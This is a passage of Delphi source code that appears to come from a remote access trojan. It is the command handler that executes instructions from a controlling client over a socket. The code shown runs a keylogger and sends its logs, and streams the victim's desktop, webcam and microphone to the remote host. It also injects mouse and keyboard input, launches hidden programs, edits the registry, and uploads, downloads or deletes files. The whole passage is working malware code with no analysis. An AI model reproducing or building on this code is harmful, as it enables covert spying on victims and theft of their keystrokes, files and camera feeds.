closethread(CommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = RENAMEKEY then begin Delete(Comando, 1, pos('|', Comando)); NumArrayRegistro := copy(Comando, 1, pos('|', Comando) - 1); Delete(Comando, 1, pos('|', Comando)); TempStr := Copy(Comando, 1, Pos('|', Comando) - 1); Delete(Comando, 1, Pos('|', Comando)); TempStr1 := Copy(Comando, 1, Pos('|', Comando) - 1); Delete(Comando, 1, Pos('|', Comando)); if RenameRegistryItem(TempStr, TempStr1) = true then begin sleep(5); ToSend := REGISTRO + '|' + RENAMEKEY + '|' + NumArrayRegistro + '|' + '272' + '|"' + TempStr + ' <---> ' + TempStr1 + '"|'; _EnviarStream(ClientSocket, ToSend); end else begin sleep(5); ToSend := REGISTRO + '|' + RENAMEKEY + '|' + NumArrayRegistro + '|' + '273' + '|"' + TempStr + ' <---> ' + TempStr1 + '"|'; _EnviarStream(ClientSocket, ToSend); end; end else if copy(Comando, 1, pos('|', Comando) - 1) = NOVONOMEVALOR then begin Delete(Comando, 1, pos('|', Comando)); TempStr := Copy(Comando, 1, Pos('|', Comando) - 1); Delete(Comando, 1, Pos('|', Comando)); TempStr1 := Copy(Comando, 1, Pos('|', Comando) - 1); Delete(Comando, 1, Pos('|', Comando)); TempStr2 := Copy(Comando, 1, Pos('|', Comando) - 1); if RenombrarClave(PChar(TempStr), PChar(TempStr1), PChar(TempStr2)) then begin sleep(5); ToSend := REGISTRO + '|' + REGISTRO + '|' + '272' + '|"' + TempStr1 + ' <---> ' + TempStr2 + '"|'; _EnviarStream(ClientSocket, ToSend); end else begin sleep(5); ToSend := REGISTRO + '|' + REGISTRO + '|' + '273' + '|"' + TempStr1 + ' <---> ' + TempStr2 + '"|'; _EnviarStream(ClientSocket, ToSend); end; closethread(CommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = APAGARREGISTRO then begin Delete(Comando, 1, pos('|', Comando)); Comando := copy(Comando, 1, pos('|', Comando) - 1); if BorraClave(Comando) then begin sleep(5); ToSend := REGISTRO + '|' + REGISTRO + '|' + '274' + '|"' + Comando + '"|'; _EnviarStream(ClientSocket, ToSend); end else begin sleep(5); ToSend := REGISTRO + '|' + REGISTRO + '|' + '275' + '|"' + Comando + '"|'; _EnviarStream(ClientSocket, ToSend); end; closethread(CommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = NOVACHAVE then begin Delete(Comando, 1, pos('|', Comando)); TempStr := Copy(Comando, 1, Pos('|', Comando) - 1); Delete(Comando, 1, Pos('|', Comando)); TempStr1 := Copy(Comando, 1, Pos('|', Comando) - 1); Tempstr4 := tempstr + tempstr1; if AniadirClave(pchar(Tempstr4), '', 'clave') then begin sleep(5); ToSend := REGISTRO + '|' + REGISTRO + '|' + '276' + '|"' + Tempstr4 + '"|'; _EnviarStream(ClientSocket, ToSend); end else begin sleep(5); ToSend := REGISTRO + '|' + REGISTRO + '|' + '277' + '|"' + Tempstr4 + '"|'; _EnviarStream(ClientSocket, ToSend); end; closethread(CommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = ADICIONARVALOR then begin Delete(Comando, 1, pos('|', Comando)); TempStr := Copy(Comando, 1, Pos('|', Comando) - 1); Delete(Comando, 1, Pos('|', Comando)); TempStr1 := Copy(Comando, 1, Pos('|', Comando) - 1); Delete(Comando, 1, Pos('|', Comando)); if AniadirClave(TempStr, Copy(Comando, 1, Pos('|', Comando) - 1), TempStr1) then begin sleep(5); ToSend := REGISTRO + '|' + REGISTRO + '|' + '278' + '|"' + Copy(Comando, 1, Pos('|', Comando) - 1) + '"|'; _EnviarStream(ClientSocket, ToSend); end else begin sleep(5); ToSend := REGISTRO + '|' + REGISTRO + '|' + '279' + '|"' + Copy(Comando, 1, Pos('|', Comando) - 1) + '"|'; _EnviarStream(ClientSocket, ToSend); end; closethread(CommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = KEYLOGGER then begin if KeyloggerThread <> 0 then _EnviarStream(ClientSocket, KEYLOGGER + '|' + KEYLOGGER + '|' + KEYLOGGERATIVAR + '|') else _EnviarStream(ClientSocket, KEYLOGGER + '|' + KEYLOGGER + '|' + KEYLOGGERDESATIVAR + '|'); closethread(CommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = KEYLOGGERATIVAR then begin if KeyloggerThread <> 0 then _EnviarStream(ClientSocket, KEYLOGGER + '|' + KEYLOGGER + '|' + KEYLOGGERATIVAR + '|') else begin KeyloggerThread := StartThread(@startkeylogger); _EnviarStream(ClientSocket, KEYLOGGER + '|' + KEYLOGGER + '|' + KEYLOGGERATIVAR + '|'); end; closethread(CommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = KEYLOGGERDESATIVAR then begin if KeyloggerThread = 0 then _EnviarStream(ClientSocket, KEYLOGGER + '|' + KEYLOGGER + '|' + KEYLOGGERDESATIVAR + '|') else begin CloseThread(KeyloggerThread); KeyloggerThread := 0; _EnviarStream(ClientSocket, KEYLOGGER + '|' + KEYLOGGER + '|' + KEYLOGGERDESATIVAR + '|'); end; closethread(CommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = KEYLOGGERGETLOG then begin if (MyGetFileSize(LogsFile) > 0) then begin TempStr := LogsFile + '.tmp'; copyfile(pchar(LogsFile), pchar(TempStr), false); TempInt := MyGetFileSize(LogsFile); EnviarArquivo(ClientSocket, KEYLOGGER + '|' + KEYLOGGERGETLOG + '|', TempStr, TempInt, 0, false); Mydeletefile(TempStr); while true do sleep(high(integer)); end else _EnviarStream(ClientSocket, KEYLOGGER + '|' + KEYLOGGER + '|' + KEYLOGGERVAZIO + '|'); closethread(CommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = KEYLOGGERERASELOG then begin MyDeleteFile(LogsFile); DecryptedLog := ''; LoggedKeys := ''; _EnviarStream(ClientSocket, KEYLOGGER + '|' + KEYLOGGER + '|' + KEYLOGGERVAZIO + '|'); closethread(CommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = KEYLOGGERSEARCH then begin Delete(Comando, 1, pos('|', Comando)); TempStr := Copy(Comando, 1, Pos('|', Comando) - 1); Delete(Comando, 1, pos('|', Comando)); if pos(TempStr, DecryptedLog) > 0 then _EnviarStream(ClientSocket, KEYLOGGERSEARCHOK + '|'); closethread(CommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = DESKTOP then begin DC1 := GetDC(GetDesktopWindow); EixoX := GetDeviceCaps(DC1, HORZRES); EixoY := GetDeviceCaps(DC1, VERTRES); ReleaseDC(GetDesktopWindow, DC1); _EnviarStream(ClientSocket, DESKTOP + '|' + DESKTOPRATIO + '|' + inttostr(EixoX) + '|' + inttostr(EixoY) + '|', true); closethread(CommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = DESKTOPPREVIEW then begin Delete(Comando, 1, pos('|', Comando)); TempStr := Copy(Comando, 1, Pos('|', Comando) - 1); // qualidade Delete(Comando, 1, Pos('|', Comando)); TempStr1 := Copy(Comando, 1, Pos('|', Comando) - 1); // eixo X Delete(Comando, 1, Pos('|', Comando)); TempStr2 := Copy(Comando, 1, Pos('|', Comando) - 1); // eixo Y Delete(Comando, 1, Pos('|', Comando)); ToSend := GetDesktopImage(strtoint(TempStr), strtoint(TempStr1), strtoint(TempStr2)); _EnviarStream(ClientSocket, DESKTOP + '|' + DESKTOPPREVIEW + '|' + ToSend); CloseHandle(CommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = DESKTOPGETBUFFER then begin //if DesktopCS <> nil then DesktopCS.Disconnect; Delete(Comando, 1, pos('|', Comando)); DesktopQuality := strtoint(copy(Comando, 1, pos('|', Comando) - 1)); Delete(Comando, 1, pos('|', Comando)); EixoXDesktop := strtoint(copy(Comando, 1, pos('|', Comando) - 1)); Delete(Comando, 1, pos('|', Comando)); EixoYDesktop := strtoint(copy(Comando, 1, pos('|', Comando) - 1)); Delete(Comando, 1, pos('|', Comando)); DesktopIntervalo := strtoint(copy(Comando, 1, pos('|', Comando) - 1)); Delete(Comando, 1, pos('|', Comando)); DesktopCS := TClientSocket.Create; Tentativa := 0; while (DesktopCS.Connected = false) and (Tentativa < 10) do begin DesktopCS.Connect(ClientSocket.RemoteAddress, ClientSocket.RemotePort); sleep(10); inc(Tentativa); end; EnviarTexto(DesktopCS, senha + '|Y|' + RESPOSTA + '|' + RandomStringClient + '|' + DESKTOP + '|' + DESKTOPGETBUFFER + '|'); sleep(1000); while (DesktopCS.Connected = true) and (ClientSocket.Connected = true) do begin if DesktopIntervalo <> 0 then sleep(DesktopIntervalo * 1000) else sleep(100); TempStr := GetDesktopImage(DesktopQuality, EixoXDesktop, EixoYDesktop); EnviarTexto(DesktopCS, TempStr); processmessages; end; sleep(1000); try DesktopCS.Destroy; except end; while true do processmessages; CloseHandle(CommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = DESKTOPSETTINGS then begin Delete(Comando, 1, pos('|', Comando)); DesktopQuality := strtoint(copy(Comando, 1, pos('|', Comando) - 1)); Delete(Comando, 1, pos('|', Comando)); EixoXDesktop := strtoint(copy(Comando, 1, pos('|', Comando) - 1)); Delete(Comando, 1, pos('|', Comando)); EixoYDesktop := strtoint(copy(Comando, 1, pos('|', Comando) - 1)); Delete(Comando, 1, pos('|', Comando)); DesktopIntervalo := strtoint(copy(Comando, 1, pos('|', Comando) - 1)); Delete(Comando, 1, pos('|', Comando)); CloseHandle(CommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = MOUSEPOSITION then begin Delete(Comando, 1, pos('|', Comando)); Point.X := strtoint(copy(Comando, 1, pos('|', Comando) - 1)); Delete(Comando, 1, pos('|', Comando)); Point.Y := strtoint(copy(Comando, 1, pos('|', Comando) - 1)); Delete(Comando, 1, pos('|', Comando)); MouseButton := strtoint(copy(Comando, 1, pos('|', Comando) - 1)); Delete(Comando, 1, pos('|', Comando)); ClientToScreen(strtoint(copy(Comando, 1, pos('|', Comando) - 1)), Point); Delete(Comando, 1, pos('|', Comando)); DC := GetDC(GetDesktopWindow); Point.X := Round(Point.X * (65535 / GetDeviceCaps(DC, 8))); Point.Y := Round(Point.Y * (65535 / GetDeviceCaps(DC, 10))); ReleaseDC(GetDesktopWindow, DC); mouse_event(MOUSEEVENTF_MOVE or MOUSEEVENTF_ABSOLUTE, Point.X, Point.Y, 0, 0); mouse_event(MouseButton, 0, 0, 0, 0); Point.X := strtoint(copy(Comando, 1, pos('|', Comando) - 1)); Delete(Comando, 1, pos('|', Comando)); Point.Y := strtoint(copy(Comando, 1, pos('|', Comando) - 1)); Delete(Comando, 1, pos('|', Comando)); MouseButton := strtoint(copy(Comando, 1, pos('|', Comando) - 1)); Delete(Comando, 1, pos('|', Comando)); delay := strtoint(copy(Comando, 1, pos('|', Comando) - 1)); sleep(delay); DC := GetDC(GetDesktopWindow); Point.X := Round(Point.X * (65535 / GetDeviceCaps(DC, 8))); Point.Y := Round(Point.Y * (65535 / GetDeviceCaps(DC, 10))); ReleaseDC(GetDesktopWindow, DC); mouse_event(MOUSEEVENTF_MOVE or MOUSEEVENTF_ABSOLUTE, Point.X, Point.Y, 0, 0); mouse_event(MouseButton, 0, 0, 0, 0); sleep(1000); closethread(CommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = KEYBOARDKEY then begin delete(Comando, 1, pos('|', Comando)); sendkeys(Comando); closethread(CommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = WEBCAMSETTINGS then begin Delete(Comando, 1, pos('|', Comando)); WebcamQuality := strtoint(copy(Comando, 1, pos('|', Comando) - 1)); Delete(Comando, 1, pos('|', Comando)); WebcamIntervalo := strtoint(copy(Comando, 1, pos('|', Comando) - 1)); Delete(Comando, 1, pos('|', Comando)); CloseHandle(CommandThreadId); end else if (copy(Comando, 1, pos('|', Comando) - 1) = WEBCAMGETBUFFER) or (copy(Comando, 1, pos('|', Comando) - 1) = WEBCAM) then begin if copy(Comando, 1, pos('|', Comando) - 1) = WEBCAM then begin if WebcamCS <> nil then WebcamCS.Disconnect(erro21); if FCapHandle <> 0 then begin DestroyCapture; FecharJanela(WebcamWindow); end; CommandThreadId := StartThread(@initCapture); sleep(1000); if DriverEmUso = true then _EnviarStream(ClientSocket, WEBCAM + '|' + WEBCAMINACTIVE + '|') else _EnviarStream(ClientSocket, WEBCAM + '|' + WEBCAMACTIVE + '|', true); exit; end; Delete(Comando, 1, pos('|', Comando)); WebcamQuality := strtoint(copy(Comando, 1, pos('|', Comando) - 1)); Delete(Comando, 1, pos('|', Comando)); WebcamIntervalo := strtoint(copy(Comando, 1, pos('|', Comando) - 1)); Delete(Comando, 1, pos('|', Comando)); WebcamCS := TClientSocket.Create; Tentativa := 0; while (WebcamCS.Connected = false) and (Tentativa < 10) do begin WebcamCS.Connect(ClientSocket.RemoteAddress, ClientSocket.RemotePort); sleep(10); inc(Tentativa); end; EnviarTexto(WebcamCS, senha + '|Y|' + RESPOSTA + '|' + RandomStringClient + '|' + WEBCAM + '|' + WEBCAMGETBUFFER + '|'); sleep(1000); while (WebcamCS.Connected = true) and (ClientSocket.Connected = true) and (FCapHandle <> 0) do begin if WebcamIntervalo <> 0 then sleep(WebcamIntervalo * 1000) else sleep(100); TempStr := MyTempFolder + inttostr(gettickcount) + '.bmp'; if FCapHandle <> 0 then if (SendMessage(FCapHandle, WM_CAP_GRAB_FRAME,0,0) <> 0) and (SendMessage(FCapHandle, WM_CAP_SAVEDIB, wparam(0), lparam(PChar(TempStr))) <> 0) then begin SendMessage(FCapHandle, WM_CAP_SET_PREVIEW, -1, 0); if fileexists(TempStr) then EnviarTexto(WebcamCS, BMPFiletoJPGString(TempStr, WebcamQuality)); MyDeleteFile(TempStr); end; processmessages; end; sleep(1000); if FCapHandle <> 0 then begin DestroyCapture; FecharJanela(WebcamWindow); end; try WebcamCS.Destroy; except end; while true do processmessages; end else if copy(Comando, 1, pos('|', Comando) - 1) = WEBCAMINACTIVE then begin if FCapHandle <> 0 then begin DestroyCapture; FecharJanela(WebcamWindow); end; sleep(1000); CloseHandle(CommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = AUDIOGETBUFFER then begin if AudioThreadId <> 0 then begin try FinalizarAudio; CloseThread(AudioThreadId); except end; AudioThreadId := 0; end; Delete(Comando, 1, pos('|', Comando)); tempstr1 := copy(Comando, 1, pos('|', Comando) - 1); Delete(Comando, 1, pos('|', Comando)); tempstr2 := copy(Comando, 1, pos('|', Comando) - 1); begin ZeroMemory(@ThreadInfoAudio, sizeof(TThreadInfoAudio)); ThreadInfoAudio.Password := senha; ThreadInfoAudio.host := ClientSocket.RemoteAddress; ThreadInfoAudio.port := ClientSocket.RemotePort; ThreadInfoAudio.IdentificacaoNoCliente := RandomStringClient; ThreadInfoAudio.Sample := strtoint(Tempstr2); ThreadInfoAudio.Channel := strtoint(Tempstr1); CarregarVariaveisAudio(ThreadInfoAudio); AudioThreadId := CommandThreadId; ThreadedTransferAudio(nil); while true do processmessages; end; closethread(CommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = AUDIOSTOP then begin if AudioThreadId <> 0 then begin try FinalizarAudio; CloseThread(AudioThreadId); except end; AudioThreadId := 0; end; closethread(CommandThreadId); end else if Copy(Comando, 1, pos('|', Comando) - 1) = LISTAR_DRIVES then begin TempStr := GetDrives; ToSend := FILEMANAGER + '|' + LISTAR_DRIVES + '|' + TempStr; _EnviarStream(ClientSocket, Tosend); closethread(CommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = LISTAR_ARQUIVOS then begin Delete(Comando, 1, pos('|', Comando)); TempStr := copy(Comando, 1, pos('|', Comando) - 1); TempStr1 := ListarArquivos(TempStr); if TempStr1 = '' then ToSend := FILEMANAGER + '|' + DIRMANAGERERROR + '|' + TempStr + '|' else ToSend := FILEMANAGER + '|' + LISTAR_ARQUIVOS + '|' + TempStr1; _EnviarStream(ClientSocket, Tosend); closethread(CommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = EXEC_NORMAL then begin delete(Comando, 1, pos('|', Comando)); TempStr1 := copy(Comando, 1, pos('|', Comando) - 1); delete(Comando, 1, pos('|', Comando)); TempStr2 := copy(Comando, 1, pos('|', Comando) - 1); if tempstr2 = ' ' then tempstr2 := ''; try if MyShellExecute(0, 'open', pchar(TempStr1), pchar(tempstr2), nil, SW_NORMAL) <= 32 then begin ToSend := FILEMANAGER + '|' + MENSAGENS + '|' + TempStr1 + '|' + '318' + '|'; _EnviarStream(ClientSocket, Tosend); end else begin ToSend := FILEMANAGER + '|' + MENSAGENS + '|' + TempStr1 + '|' + '319' + '|'; _EnviarStream(ClientSocket, ToSend); end; except ToSend := FILEMANAGER + '|' + MENSAGENS + '|' + TempStr1 + '|' + '318' + '|'; _EnviarStream(ClientSocket, ToSend); end; closethread(CommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = EXEC_INV then begin delete(Comando, 1, pos('|', Comando)); TempStr1 := copy(Comando, 1, pos('|', Comando) - 1); delete(Comando, 1, pos('|', Comando)); TempStr2 := copy(Comando, 1, pos('|', Comando) - 1); if tempstr2 = ' ' then tempstr2 := ''; try if MyShellExecute(0, 'open', pchar(TempStr1), pchar(tempstr2), nil, SW_HIDE) <= 32 then begin ToSend := FILEMANAGER + '|' + MENSAGENS + '|' + TempStr1 + '|' + '318' + '|'; _EnviarStream(ClientSocket, Tosend); end else begin ToSend := FILEMANAGER + '|' + MENSAGENS + '|' + TempStr1 + '|' + '319' + '|'; _EnviarStream(ClientSocket, ToSend); end; except ToSend := FILEMANAGER + '|' + MENSAGENS + '|' + TempStr1 + '|' + '318' + '|'; _EnviarStream(ClientSocket, ToSend); end; closethread(CommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = DELETAR_DIR then begin delete(Comando, 1, pos('|', Comando)); TempStr1 := copy(Comando, 1, pos('|', Comando) - 1); if DeleteFolder(pchar(TempStr1)) = true then begin ToSend := FILEMANAGER + '|' + MENSAGENS + '|' + TempStr1 + '|' + '320' + '|'; _EnviarStream(ClientSocket, ToSend); end else begin ToSend := FILEMANAGER + '|' + MENSAGENS + '|' + TempStr1 + '|' + '321' + '|'; _EnviarStream(ClientSocket, ToSend); end; closethread(CommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = DELETAR_ARQ then begin delete(Comando, 1, pos('|', Comando)); Tempstr1 := copy(Comando, 1, pos('|', Comando) - 1); if MyDeleteFile(pchar(Tempstr1)) = true then begin ToSend := FILEMANAGER + '|' + MENSAGENS + '|' + TempStr1 + '|' + '320' + '|'; _EnviarStream(ClientSocket, ToSend); end else begin ToSend := FILEMANAGER + '|' + MENSAGENS + '|' + TempStr1 + '|' + '321' + '|'; _EnviarStream(ClientSocket, ToSend); end; closethread(CommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = RENOMEAR_DIR then begin delete(Comando, 1, pos('|', Comando)); TempStr1 := copy(Comando, 1, pos('|', Comando) - 1); delete(Comando, 1, pos('|', Comando)); TempStr2 := copy(Comando, 1, pos('|', Comando) - 1); if MyRenameFile_Dir(TempStr1, TempStr2) = true then begin ToSend := FILEMANAGER + '|' + MENSAGENS + '|' + TempStr1 + '--->' + TempStr2 + '|' + '322' + '|'; _EnviarStream(ClientSocket, ToSend); end else begin ToSend := FILEMANAGER + '|' + MENSAGENS + '|' + TempStr1 + '--->' + TempStr2 + '|' + '323' + '|'; _EnviarStream(ClientSocket, ToSend); end; closethread(CommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = RENOMEAR_ARQ then begin delete(Comando, 1, pos('|', Comando)); TempStr1 := copy(Comando, 1, pos('|', Comando) - 1); delete(Comando, 1, pos('|', Comando)); TempStr2 := copy(Comando, 1, pos('|', Comando) - 1); if MyRenameFile_Dir(TempStr1, TempStr2) = true then begin ToSend := FILEMANAGER + '|' + MENSAGENS + '|' + TempStr1 + '--->' + TempStr2 + '|' + '322' + '|'; _EnviarStream(ClientSocket, ToSend); end else begin ToSend := FILEMANAGER + '|' + MENSAGENS + '|' + TempStr1 + '--->' + TempStr2 + '|' + '323' + '|'; _EnviarStream(ClientSocket, ToSend); end; closethread(CommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = CRIAR_PASTA then begin delete(Comando, 1, pos('|', Comando)); TempStr1 := copy(Comando, 1, pos('|', Comando) - 1); if CreateDirectory(pchar(TempStr1), nil) = true then begin ToSend := FILEMANAGER + '|' + MENSAGENS + '|' + TempStr1 + '|' + '324' + '|'; _EnviarStream(ClientSocket, ToSend); end else begin ToSend := FILEMANAGER + '|' + MENSAGENS + '|' + TempStr1 + '|' + '325' + '|'; _EnviarStream(ClientSocket, ToSend); end; closethread(CommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = DESKTOP_PAPER then begin delete(Comando, 1, pos('|', Comando)); TempStr := copy(Comando, 1, pos('|', Comando) - 1); SaveAnyImageToBMPFile(TempStr, TempStr1); try SystemParametersInfo(SPI_SETDESKWALLPAPER, 0, pchar(TempStr1), SPIF_SENDCHANGE); ToSend := FILEMANAGER + '|' + MENSAGENS + '|' + TempStr + '|' + '326' + '|'; _EnviarStream(ClientSocket, ToSend); except begin ToSend := FILEMANAGER + '|' + MENSAGENS + '|' + TempStr + '|' + '327' + '|'; _EnviarStream(ClientSocket, ToSend); end; end; closethread(CommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = COPIAR_ARQ then begin Delete(Comando, 1, pos('|', Comando)); TempStr1 := copy(Comando, 1, pos('|', Comando) - 1); Delete(Comando, 1, pos('|', Comando)); tempstr := copy(Comando, 1, pos('|', Comando) - 1); Delete(Comando, 1, pos('|', Comando)); TempStr2 := copy(Comando, 1, pos('|', Comando) - 1); if copyfile(pchar(TempStr1 + tempstr), pchar(TempStr2 + tempstr), FALSE) = true then begin ToSend := FILEMANAGER + '|' + MENSAGENS + '|' + TempStr1 + tempstr + '--->' + TempStr2 + tempstr + '|' + '328' + '|'; _EnviarStream(ClientSocket, ToSend); end else begin ToSend := FILEMANAGER + '|' + MENSAGENS + '|' + TempStr1 + tempstr + '--->' + TempStr2 + tempstr + '|' + '328' + '|'; _EnviarStream(ClientSocket, ToSend); end; end else if copy(Comando, 1, pos('|', Comando) - 1) = COPIAR_PASTA then begin Delete(Comando, 1, pos('|', Comando)); TempStr1 := copy(Comando, 1, pos('|', Comando) - 1); Delete(Comando, 1, pos('|', Comando)); tempstr := copy(Comando, 1, pos('|', Comando) - 1); Delete(Comando, 1, pos('|', Comando)); TempStr2 := copy(Comando, 1, pos('|', Comando) - 1); if CopyDirectory(0, pchar(TempStr1 + tempstr), pchar(TempStr2)) = true then begin ToSend := FILEMANAGER + '|' + MENSAGENS + '|' + TempStr1 + tempstr + '--->' + TempStr2 + tempstr + '|' + '328' + '|'; _EnviarStream(ClientSocket, ToSend); end else begin ToSend := FILEMANAGER + '|' + MENSAGENS + '|' + TempStr1 + tempstr + '--->' + TempStr2 + tempstr + '|' + '328' + '|'; _EnviarStream(ClientSocket, ToSend); end; end else if copy(Comando, 1, pos('|', Comando) - 1) = THUMBNAIL then begin Delete(Comando, 1, pos('|', Comando)); TempStr := copy(Comando, 1, pos('|', Comando) - 1); Delete(Comando, 1, pos('|', Comando)); TempStr1 := copy(Comando, 1, pos('|', Comando) - 1); Delete(Comando, 1, pos('|', Comando)); if fileexists(TempStr1) = false then begin ToSend := FILEMANAGER + '|' + THUMBNAILERROR + '|'; _EnviarStream(ClientSocket, Tosend); exit; end; TempStr2 := GetAnyImageToString(TempStr1, 75, 96, 96); ToSend := FILEMANAGER + '|' + THUMBNAIL + '|' + TempStr + '|' + TempStr1 + '|' + TempStr2; _EnviarStream(ClientSocket, Tosend); closethread(CommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = DOWNLOAD then begin Delete(Comando, 1, pos('|', Comando)); Tempstr := copy(Comando, 1, pos('|', Comando) - 1); TempInt := MyGetFileSize(Tempstr); if (fileexists(Tempstr) = true) and (TempInt > 0) and (PossoMexerNoArquivo(Tempstr) = true) then EnviarArquivo(ClientSocket, FILEMANAGER + '|' + DOWNLOAD + '|' + TempStr + '|', TempStr, TempInt, 0) else _EnviarStream(ClientSocket, FILEMANAGER + '|' + FILEMANAGERERROR + '|' + Tempstr + '|'); closethread(CommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = DOWNLOADREC then begin Delete(Comando, 1, pos('|', Comando)); Tempstr := copy(Comando, 1, pos('|', Comando) - 1); TempInt := MyGetFileSize(Tempstr); if (fileexists(Tempstr) = true) and (TempInt > 0) and (PossoMexerNoArquivo(Tempstr) = true) then EnviarArquivo(ClientSocket, FILEMANAGER + '|' + DOWNLOADREC + '|' + extractfilepath(Tempstr) + '|' + TempStr + '|', TempStr, TempInt, 0) else _EnviarStream(ClientSocket, FILEMANAGER + '|' + FILEMANAGERERROR + '|' + Tempstr + '|'); closethread(CommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = RESUMETRANSFER then begin Delete(Comando, 1, pos('|', Comando)); Tempstr := copy(Comando, 1, pos('|', Comando) - 1); Delete(Comando, 1, pos('|', Comando)); TempInt := strtoint(copy(Comando, 1, pos('|', Comando) - 1)); TempInt2 := MyGetFileSize(Tempstr); if (fileexists(Tempstr) = true) and (PossoMexerNoArquivo(Tempstr) = true) then EnviarArquivo(ClientSocket, FILEMANAGER + '|' + RESUMETRANSFER + '|' + TempStr + '|', TempStr, TempInt2, TempInt) else _EnviarStream(ClientSocket, FILEMANAGER + '|' + FILEMANAGERERROR + '|' + Tempstr + '|'); closethread(CommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = UPLOAD then begin Delete(Comando, 1, Pos('|', Comando)); TempStr := Copy(Comando, 1, Pos('|', Comando) - 1); // arquivo no cliente Delete(Comando, 1, Pos('|', Comando)); TempStr1 := Copy(Comando, 1, Pos('|', Comando) - 1); // onde vou salvar Delete(Comando, 1, Pos('|', Comando)); TempStr2 := Copy(Comando, 1, Pos('|', Comando) - 1); // Tamanho Delete(Comando, 1, Pos('|', Comando)); Criararquivo(TempStr1, 'XXX', 3); if MyDeleteFile(TempStr1) = false then _EnviarStream(ClientSocket, FILEMANAGER + '|' + FILEMANAGERERROR + '|' + TempStr1 + '|') else ReceberArquivo2(ClientSocket, FILEMANAGER + '|' + UPLOAD + '|' + TempStr + '|', TempStr1, strtoint(TempStr2)); end else if copy(Comando, 1, pos('|', Comando) - 1) = PROCURAR_ARQ then begin ToSendSearch := ''; if SearchID <> 0 then CloseThread(SearchID); delete(Comando, 1, pos('|', Comando)); TempStr1 := copy(Comando, 1, pos('|', Comando) - 1); delete(Comando, 1, pos('|', Comando)); TempStr2 := copy(Comando, 1, pos('|', Comando) - 1); ThreadSearch := TThreadSearch.Create(TempStr1, TempStr2); SearchID := BeginThread(nil, 0, @ProcurarArquivo, ThreadSearch, 0, ThreadId); while true do processmessages; end else if copy(Comando, 1, pos('|', Comando) - 1) = PROCURAR_ARQ_PARAR then begin if SearchID <> 0 then CloseThread(SearchID); SearchID := 0; TempStr := ToSendSearch; ToSendSearch := ''; if TempStr <> '' then begin ToSend := FILEMANAGER + '|' + PROCURAR_ARQ + '|' + TempStr; _EnviarStream(ClientSocket, ToSend); end else begin ToSend := FILEMANAGER + '|' + PROCURARERROR + '|'; _EnviarStream(ClientSocket, ToSend); end; end else if copy(Comando, 1, pos('|', Comando) - 1) = THUMBNAILSEARCH then begin Delete(Comando, 1, pos('|', Comando)); TempStr := copy(Comando, 1, pos('|', Comando) - 1); Delete(Comando, 1, pos('|', Comando)); TempStr1 := copy(Comando, 1, pos('|', Comando) - 1); Delete(Comando, 1, pos('|', Comando)); if fileexists(TempStr1) = false then begin ToSend := FILEMANAGER + '|' + THUMBNAILSEARCHERROR + '|'; _EnviarStream(ClientSocket, Tosend); exit; end; TempStr2 := GetAnyImageToString(TempStr1, 75, 96, 96); ToSend := FILEMANAGER + '|' + THUMBNAILSEARCH + '|' + TempStr + '|' + TempStr1 + '|' + TempStr2; _EnviarStream(ClientSocket, Tosend); closethread(CommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = MULTITHUMBNAIL then begin Delete(Comando, 1, pos('|', Comando)); TempStr3 := ''; while Comando <> '' do begin sleep(10); TempStr := copy(Comando, 1, pos('|', Comando) - 1); Delete(Comando, 1, pos('|', Comando)); TempStr1 := copy(Comando, 1, pos('|', Comando) - 1); Delete(Comando, 1, pos('|', Comando)); if fileexists(TempStr1) = false then Continue; TempStr2 := GetAnyImageToString(TempStr1, 75, 96, 96); TempStr3 := TempStr3 + TempStr + '|' + TempStr2 + DelimitadorDeImagem; end; if TempStr3 = '' then begin ToSend := FILEMANAGER + '|' + THUMBNAILERROR + '|'; _EnviarStream(ClientSocket, Tosend); exit; end; ToSend := FILEMANAGER + '|' + MULTITHUMBNAIL + '|' + TempStr3; _EnviarStream(ClientSocket, Tosend); closethread(CommandThreadId); end else if copy(Comando, 1, pos('|', Comando) - 1) = MULTITHUMBNAILSEARCH then begin Delete(Comando, 1, pos('|', Comando)); TempStr3 := ''; while Comando <> '' do begin sleep(10); TempStr := copy(Comando, 1, pos('|', Comando) - 1); Delete(Comando, 1, pos('|', Comando)); TempStr1 := copy(Comando, 1, pos('|', Comando) - 1); Delete(Comando, 1, pos('|', Comando)); if fileexists(TempStr1) = false then Continue; TempStr2 := GetAnyImageToString(TempStr1, 75, 96, 96); TempStr3 := TempStr3 + TempStr + '|' + TempStr2 + DelimitadorDeImagem; // delimitador end; if TempStr3 = '' then begin ToSend := FILEMANAGER + '|' + THUMBNAILSEARCHERROR + '|'; _EnviarStream(ClientSocket, Tosend); 